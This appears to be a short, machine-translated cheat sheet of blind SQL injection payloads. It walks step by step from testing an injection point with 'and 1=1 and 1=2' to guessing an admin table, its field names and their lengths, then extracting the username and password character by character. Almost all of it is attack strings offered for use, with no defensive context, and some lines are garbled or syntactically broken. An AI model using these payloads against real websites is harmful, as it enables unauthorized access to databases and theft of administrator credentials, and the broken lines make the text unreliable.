1. Determine if there are any injection points
; and 1=1 and 1=2
2. Guess the table name is nothing more than the admin Adminuser user pass password and so on.
and 0<> (SELECT COUNT (*) from *)
and 0<> (SELECT COUNT (*) from admin)---Determine if the admin table exists
3. Guess the number of accounts if you encounter 0< return to the correct page 1< the error page describes the number of accounts is a
and 0< (SELECT COUNT (*) from admin)
and 1< (SELECT COUNT (*) from admin)
4. Guess the field name in Len () parentheses plus the field name we think of.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)--
and 1= (SELECT COUNT (*) from admin where Len (user field name "name") >0)
and 1= (SELECT COUNT (*) from admin where Len (_blank> password field name password) >0)
5. Guess the length of each field the length of the solution is to transform the >0 until it returns to the correct page.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)
and 1= (SELECT COUNT (*) from admin where Len (name) >6) error
and 1= (SELECT COUNT (*) from admin where Len (name) >5) The correct length is 6
and 1= (SELECT COUNT (*) from admin where Len (name) =6) is correct
and 1= (SELECT COUNT (*) from admin where Len (password) >11) correct
and 1= (SELECT COUNT (*) from admin where Len (password) >12) error length is 12
and 1= (SELECT COUNT (*) from admin where Len (password) =12) correct
6. Guessing characters
and 1= (SELECT COUNT (*) from the admin where left (name,1) =a)---Guess the first bit of the user account
and 1= (SELECT COUNT (*) from the admin where left (name,2) =ab)---Guess the second digit of the user account
Just add one character at a time so guess, guess enough you just guessed how many bits of the right, the account even came out
and 1= (select top 1 count (*) from Admin where ASC (mid (pass,5,1)) =51)--
Standard SQL injection Statements